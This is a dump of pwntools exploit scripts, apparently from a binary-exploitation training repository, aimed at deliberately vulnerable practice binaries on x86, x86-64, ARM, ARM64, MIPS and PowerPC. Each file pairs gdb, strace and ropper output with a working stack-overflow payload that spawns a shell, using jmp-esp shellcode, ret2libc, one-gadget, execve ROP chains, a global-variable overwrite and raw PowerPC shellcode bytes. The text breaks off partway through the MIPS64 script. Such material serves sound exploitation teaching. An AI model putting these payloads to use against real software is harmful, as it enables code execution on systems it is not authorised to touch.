0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | import struct 32 | import sys 33 | 34 | from pwn import * 35 | 36 | context(arch='x86', os='linux', endian='little', word_size=32) 37 | 38 | binary_path = './bin/x86/05-shellcode-dynamic' 39 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 40 | 41 | vulnerable_ret_addr = 0xffffcf8c 42 | buffer_addr = 0xffffcf00 43 | libc_addr = 0xf7dd1000 44 | 45 | libc = ELF(libc_path) 46 | jmp_esp_asm = asm('jmp esp') 47 | jmp_esp_addr = libc_addr + libc.search(jmp_esp_asm).next() 48 | 49 | shellcode = asm(shellcraft.sh()) 50 | 51 | p = process(binary_path) 52 | #p = gdb.debug([binary_path]) 53 | 54 | payload = '' 55 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 56 | payload += p32(jmp_esp_addr) 57 | payload += shellcode 58 | 59 | p.readuntil('> ') 60 | p.write(payload) 61 | p.interactive() 62 | -------------------------------------------------------------------------------- /pwn/arm/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010460 <+0>: push {r7, lr} 7 | ... 8 | 0x00010498 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x00010498 11 | Breakpoint 1 at 0x10498: file src/06-system-rop.c, line 11. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x00010498 in vulnerable () at src/06-system-rop.c:11 16 | 11 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeef00 'a' , "\251\004\001" 19 | (gdb) i r $sp 20 | sp 0xfffeef80 0xfffeef80 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/06-system-rop 25 | ... 26 | 28159 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 28159 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x0004c630 (0x0004c631): pop {r0, pc}; 35 | """ 36 | 37 | import struct 38 | import sys 39 | 40 | from pwn import * 41 | 42 | context(arch='arm', os='linux', endian='little', word_size=32) 43 | 44 | binary_path = './bin/arm/06-system-rop' 45 | libc_path = '/usr/arm-linux-gnueabihf/lib/libc-2.27.so' 46 | 47 | saved_pc_addr = 0xfffeef80 + 4 48 | buffer_addr = 0xfffeef00 49 | libc_addr = 0xff6a9000 50 | 51 | pop_r0_pc_addr = libc_addr + 0x0004c631 52 | 53 | libc = ELF(libc_path) 54 | system_addr = libc_addr + libc.symbols['system'] 55 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 56 | 57 | p = process(binary_path) 58 | #p = gdb.debug([binary_path]) 59 | 60 | payload = '' 61 | payload += 'a' * (saved_pc_addr - buffer_addr) 62 | payload += p32(pop_r0_pc_addr) 63 | payload += p32(bin_sh_addr) 64 | payload += p32(system_addr) 65 | 66 | p.readuntil('> ') 67 | p.write(payload) 68 | p.interactive() 69 | -------------------------------------------------------------------------------- /pwn/x86/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484b6: file src/06-system-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/06-system-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 14115 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | import struct 32 | import sys 33 | 34 | from pwn import * 35 | 36 | context(arch='x86', os='linux', endian='little', word_size=32) 37 | 38 | binary_path = './bin/x86/06-system-rop' 39 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 40 | 41 | vulnerable_ret_addr = 0xffffcf8c 42 | buffer_addr = 0xffffcf00 43 | libc_addr = 0xf7dd1000 44 | 45 | libc = ELF(libc_path) 46 | system_addr = libc_addr + libc.symbols['system'] 47 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 48 | 49 | p = process(binary_path) 50 | #p = gdb.debug([binary_path]) 51 | 52 | payload = '' 53 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 54 | payload += p32(system_addr) 55 | payload += p32(0) # fake return address from system 56 | payload += p32(bin_sh_addr) 57 | 58 | p.readuntil('> ') 59 | p.write(payload) 60 | p.interactive() 61 | -------------------------------------------------------------------------------- /pwn/mips/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x004007c0 <+0>: addiu sp,sp,-160 7 | 0x004007c4 <+4>: sw ra,156(sp) 8 | ... 9 | 0x0040085c <+156>: lw ra,156(sp) 10 | 0x00400860 <+160>: lw s8,152(sp) 11 | 0x00400864 <+164>: addiu sp,sp,160 12 | 0x00400868 <+168>: jr ra 13 | 0x0040086c <+172>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x4007dc: file src/04-shellcode-static.c, line 6. 17 | (gdb) b *0x0040085c 18 | Breakpoint 2 at 0x40085c: file src/04-shellcode-static.c, line 14. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef58 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0040085c in vulnerable () at src/04-shellcode-static.c:14 30 | 14 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefdc 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/04-shellcode-static 37 | ... 38 | 18573 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 18573 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 42 | """ 43 | 44 | import struct 45 | import sys 46 | 47 | from pwn import * 48 | 49 | context(arch='mips', os='linux', endian='big', word_size=32) 50 | 51 | binary_path = './bin/mips/04-shellcode-static' 52 | 53 | ra_saved_addr = 0x7fffefdc 54 | buffer_addr = 0x7fffef58 55 | libc_addr = 0x7f615000 56 | 57 | shellcode = asm(shellcraft.sh()) 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (ra_saved_addr - buffer_addr) 64 | payload += p32(ra_saved_addr + 4) 65 | payload += shellcode 66 | 67 | p.readuntil('> ') 68 | p.write(payload) 69 | p.interactive() 70 | -------------------------------------------------------------------------------- /pwn/x86/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484b6: file src/03-one-gadget.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 1924 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ one_gadget /lib/i386-linux-gnu/libc-2.27.so 33 | 0x3d0d3 execve("/bin/sh", esp+0x34, environ) 34 | constraints: 35 | esi is the GOT address of libc 36 | [esp+0x34] == NULL 37 | ... 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='x86', os='linux', endian='little', word_size=32) 46 | 47 | binary_path = './bin/x86/03-one-gadget' 48 | 49 | vulnerable_ret_addr = 0xffaf368c 50 | buffer_addr = 0xffaf3600 51 | libc_addr = 0xf7dd1000 52 | one_gadget_addr = libc_addr + 0x3d0d3 53 | 54 | p = process(binary_path) 55 | #p = gdb.debug([binary_path]) 56 | 57 | payload = '' 58 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 59 | payload += p32(one_gadget_addr) 60 | payload += p32(0) * ((256 - len(payload)) / 4) 61 | 62 | p.readuntil('> ') 63 | p.write(payload) 64 | p.interactive() 65 | -------------------------------------------------------------------------------- /pwn/x86-64/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/03-one-gadget.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 12820 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ one_gadget ./x86-64-libc-2.27.so 33 | 0x4f322 execve("/bin/sh", rsp+0x40, environ) 34 | constraints: 35 | [rsp+0x40] == NULL 36 | ... 37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='amd64', os='linux', endian='little', word_size=64) 45 | 46 | binary_path = './bin/x86-64/03-one-gadget' 47 | 48 | vulnerable_ret_addr = 0x7fffffffddf8 49 | buffer_addr = 0x7fffffffdd70 50 | libc_addr = 0x7ffff79e4000 51 | one_gadget_addr = libc_addr + 0x4f322 52 | 53 | p = process(binary_path) 54 | #p = gdb.debug([binary_path]) 55 | 56 | payload = '' 57 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 58 | payload += p64(one_gadget_addr) 59 | payload += p64(0) * ((256 - len(payload)) / 8) 60 | 61 | p.readuntil('> ') 62 | p.write(payload) 63 | p.interactive() 64 | -------------------------------------------------------------------------------- /pwn/ppc/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x100005a8 <+92>: lwz r0,4(r11) 9 | 0x100005ac <+96>: mtlr r0 10 | 0x100005a8 <+100>: lwz r31,-4(r11) 11 | 0x100005b4 <+104>: mr r1,r11 12 | 0x100005b8 <+108>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/04-shellcode-static.c, line 6. 16 | (gdb) b *0x100005a8 17 | Breakpoint 2 at 0x100005a8: file src/04-shellcode-static.c, line 14. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0xffffdd58 "\377\377\335", 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x100005a8 in vulnerable () at src/04-shellcode-static.c:14 29 | 14 } 30 | (gdb) p/x $r11+4 31 | $2 = 0xffffdde4 32 | """ 33 | 34 | import struct 35 | import sys 36 | 37 | from pwn import * 38 | 39 | context(arch='powerpc', os='linux', endian='big', word_size=32) 40 | 41 | binary_path = './bin/ppc/04-shellcode-static' 42 | 43 | saved_pc_addr = 0xffffdde4 44 | buffer_addr = 0xffffdd58 45 | 46 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 47 | shellcode = \ 48 | '\x7c\x3f\x0b\x78' + \ 49 | '\x7c\xa5\x2a\x79' + \ 50 | '\x42\x40\xff\xf9' + \ 51 | '\x7f\x08\x02\xa6' + \ 52 | '\x3b\x18\x01\x34' + \ 53 | '\x98\xb8\xfe\xfb' + \ 54 | '\x38\x78\xfe\xf4' + \ 55 | '\x90\x61\xff\xf8' + \ 56 | '\x38\x81\xff\xf8' + \ 57 | '\x90\xa1\xff\xfc' + \ 58 | '\x3b\xc0\x01\x60' + \ 59 | '\x7f\xc0\x2e\x70' + \ 60 | '\x44\x00\x00\x00' + \ 61 | '/bin/shZ' 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (saved_pc_addr - buffer_addr) 68 | payload += p32(saved_pc_addr + 4) 69 | payload += shellcode 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/x86/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) bt 5 | #0 0xf7fd5059 in __kernel_vsyscall () 6 | #1 0xf7eb7cd7 in read () from /lib/i386-linux-gnu/libc.so.6 7 | #2 0x08048526 in vulnerable () at src/04-shellcode-static.c:10 8 | #3 0x08048552 in main (argc=1, argv=0xffffd0a4) at src/04-shellcode-static.c:17 9 | (gdb) disassemble vulnerable 10 | Dump of assembler code for function vulnerable: 11 | 0x080484e6 <+0>: push ebp 12 | ... 13 | 0x0804853b <+85>: ret 14 | End of assembler dump. 15 | (gdb) b *0x0804853b 16 | Breakpoint 1 at 0x804853b: file src/04-shellcode-static.c, line 14. 17 | (gdb) c 18 | Continuing. 19 | 20 | Breakpoint 1, 0x0804853b in vulnerable () at src/04-shellcode-static.c:14 21 | 14 } 22 | (gdb) p &buffer[0] 23 | $1 = 0xffffcf60 'a' , "\001" 24 | (gdb) i r $sp 25 | sp 0xffffcfec 0xffffcfec 26 | (gdb) info proc mappings 27 | process 28174 28 | Mapped address spaces: 29 | 30 | Start Addr End Addr Size Offset objfile 31 | ... 32 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 33 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 34 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 35 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 36 | ... 37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='x86', os='linux', endian='little', word_size=32) 45 | 46 | binary_path = './bin/x86/04-shellcode-static' 47 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 48 | 49 | vulnerable_ret_addr = 0xffffcfec 50 | buffer_addr = 0xffffcf60 51 | libc_addr = 0xf7dd1000 52 | 53 | shellcode = asm(shellcraft.sh()) 54 | 55 | p = process(binary_path) 56 | #g = gdb.attach(p, 'file ./bin/x86/04-shellcode-static') 57 | 58 | payload = '' 59 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 60 | payload += p32(vulnerable_ret_addr + 4) 61 | payload += shellcode 62 | 63 | p.readuntil('> ') 64 | p.write(payload) 65 | p.interactive() 66 | -------------------------------------------------------------------------------- /pwn/arm/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010460 <+0>: push {r7, lr} 7 | ... 8 | 0x00010498 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x00010498 11 | Breakpoint 1 at 0x10498: file src/07-execve-rop.c, line 11. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x00010498 in vulnerable () at src/07-execve-rop.c:11 16 | 11 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeeef0 'a' , "\225\035p\377,\357w\377" 19 | (gdb) i r $sp 20 | sp 0xfffeef70 0xfffeef70 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/07-execve-rop 25 | ... 26 | 28850 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 28850 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00058d94 (0x00058d95): pop {r0, r1, r2, r6, r7, pc}; 35 | 0x00017204 (0x00017205): svc #0; pop {r7, pc}; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='arm', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/arm/07-execve-rop' 46 | libc_path = '/usr/arm-linux-gnueabihf/lib/libc-2.27.so' 47 | 48 | saved_pc_addr = 0xfffeef70 + 4 49 | buffer_addr = 0xfffeeef0 50 | libc_addr = 0xff6a9000 51 | 52 | pop_all_addr = libc_addr + 0x00058d95 53 | svc_addr = libc_addr + 0x00017205 54 | 55 | libc = ELF(libc_path) 56 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 57 | 58 | p = process(binary_path) 59 | #p = gdb.debug([binary_path]) 60 | 61 | payload = '' 62 | payload += 'a' * (saved_pc_addr - buffer_addr) 63 | payload += p32(pop_all_addr) 64 | payload += p32(bin_sh_addr) # r0 65 | payload += p32(0) # r1 66 | payload += p32(0) # r2 67 | payload += p32(0) # r6 68 | payload += p32(0xb) # r7, execve 69 | payload += p32(svc_addr) # pc 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/x86-64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x400607: file src/05-shellcode-dynamic.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:5 13 | warning: Source file is more recent than executable. 14 | 5 int vulnerable() { 15 | (gdb) i r $rsp 16 | rsp 0x7fffffffddf8 0x7fffffffddf8 17 | (gdb) p &buffer[0] 18 | $1 = 0x7fffffffdd70 "\377\377\377\377" 19 | (gdb) info proc mappings 20 | process 13562 21 | Mapped address spaces: 22 | 23 | Start Addr End Addr Size Offset objfile 24 | ... 25 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 29 | """ 30 | 31 | import struct 32 | import sys 33 | 34 | from pwn import * 35 | 36 | context(arch='amd64', os='linux', endian='little', word_size=64) 37 | 38 | binary_path = './bin/x86-64/05-shellcode-dynamic' 39 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 40 | 41 | vulnerable_ret_addr = 0x7fffffffddf8 42 | buffer_addr = 0x7fffffffdd70 43 | libc_addr = 0x7ffff79e4000 44 | 45 | libc = ELF(libc_path) 46 | jmp_rsp_asm = asm('jmp rsp') 47 | jmp_rsp_addr = libc_addr + libc.search(jmp_rsp_asm).next() 48 | 49 | shellcode = asm(shellcraft.sh()) 50 | 51 | p = process(binary_path) 52 | #p = gdb.debug([binary_path]) 53 | 54 | payload = '' 55 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 56 | payload += p64(jmp_rsp_addr) 57 | payload += shellcode 58 | 59 | p.readuntil('> ') 60 | p.write(payload) 61 | p.interactive() 62 | -------------------------------------------------------------------------------- /pwn/arm/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010490 <+0>: push {r7, lr} 7 | ... 8 | 0x000104c8 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x000104c8 11 | Breakpoint 1 at 0x104c8: file src/08-overwrite-global.c, line 14. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x000104c8 in vulnerable () at src/08-overwrite-global.c:14 16 | 14 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeeea0 'a' , "-\037k\377" 19 | (gdb) i r $sp 20 | sp 0xfffeef20 0xfffeef20 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/08-overwrite-global 25 | ... 26 | 8122 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 8122 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00008f2c (0x00008f2d): pop {r0, r3, r4, pc}; 35 | 0x0009449a (0x0009449b): str r0, [r3]; pop {r3, pc}; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='arm', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/arm/08-overwrite-global' 46 | 47 | saved_pc_addr = 0xfffeef20 + 4 48 | buffer_addr = 0xfffeeea0 49 | libc_addr = 0xff6a9000 50 | 51 | pop_r0_r3_r4_pc_addr = libc_addr + 0x00008f2d 52 | str_r0_r3_pop_r3_pc_addr = libc_addr + 0x0009449b 53 | 54 | binary = ELF(binary_path) 55 | not_called_addr = binary.symbols['not_called'] 56 | x_addr = binary.symbols['x'] 57 | 58 | p = process(binary_path) 59 | #p = gdb.debug([binary_path]) 60 | 61 | payload = '' 62 | payload += 'a' * (saved_pc_addr - buffer_addr) 63 | payload += p32(pop_r0_r3_r4_pc_addr) 64 | payload += p32(0xbeefc0de) # r0 65 | payload += p32(x_addr) # r3 66 | payload += p32(0) # r4 67 | payload += p32(str_r0_r3_pop_r3_pc_addr) # pc 68 | payload += p32(0) # r3 69 | payload += p32(not_called_addr) # pc 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/arm64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006c0 <+0>: stp x29, x30, [sp, #-32]! 7 | 0x00000000004006c4 <+4>: mov x29, sp 8 | 0x00000000004006c8 <+8>: str w0, [x29, #28] 9 | 0x00000000004006cc <+12>: str x1, [x29, #16] 10 | 0x00000000004006d0 <+16>: bl 0x400674 11 | 0x00000000004006d4 <+20>: mov w0, #0x0 // #0 12 | 0x00000000004006d8 <+24>: ldp x29, x30, [sp], #32 13 | 0x00000000004006dc <+28>: ret 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40067c: file src/04-shellcode-static.c, line 6. 17 | (gdb) b *0x00000000004006d8 18 | Breakpoint 2 at 0x4006d8: file src/04-shellcode-static.c, line 20. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x40007ffd80 "" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, main (argc=1, argv=0x40007fff58) at src/04-shellcode-static.c:20 30 | 20 } 31 | (gdb) i r $sp 32 | sp 0x40007ffe00 0x40007ffe00 33 | """ 34 | 35 | """ 36 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/04-shellcode-static 37 | ... 38 | 17997 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 17997 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 41 | ... 42 | """ 43 | 44 | import struct 45 | import sys 46 | 47 | from pwn import * 48 | 49 | context(arch='aarch64', os='linux', endian='little', word_size=64) 50 | 51 | binary_path = './bin/arm64/04-shellcode-static' 52 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 53 | 54 | saved_x30_addr = 0x40007ffe00 + 8 55 | buffer_addr = 0x40007ffd80 56 | libc_addr = 0x0000004000852000 57 | 58 | shellcode = asm(shellcraft.sh()) 59 | 60 | p = process(binary_path) 61 | #p = gdb.debug([binary_path]) 62 | 63 | payload = '' 64 | payload += 'a' * (saved_x30_addr - buffer_addr) 65 | payload += p64(saved_x30_addr + 8) 66 | payload += shellcode 67 | 68 | p.readuntil('> ') 69 | p.write(payload) 70 | p.interactive() 71 | -------------------------------------------------------------------------------- /pwn/mips64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c70 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c74 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000ce8 <+120>: ld ra,152(sp) 10 | 0x0000000120000cec <+124>: ld s8,144(sp) 11 | 0x0000000120000cf0 <+128>: ld gp,136(sp) 12 | 0x0000000120000cf4 <+132>: daddiu sp,sp,160 13 | 0x0000000120000cf8 <+136>: jr ra 14 | 0x0000000120000cfc <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c90: file src/02-overwrite-ret.c, line 11. 18 | (gdb) b *0x0000000120000ce8 19 | Breakpoint 2 at 0x120000ce8: file src/02-overwrite-ret.c, line 16. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 24 | 11 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd60 "" 27 | (gdb) p/x $sp+152 28 | $2 = 0x40007ffdf8 29 | """ 30 | 31 | """ 32 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/02-overwrite-ret 33 | ... 34 | 6035 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 6035 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 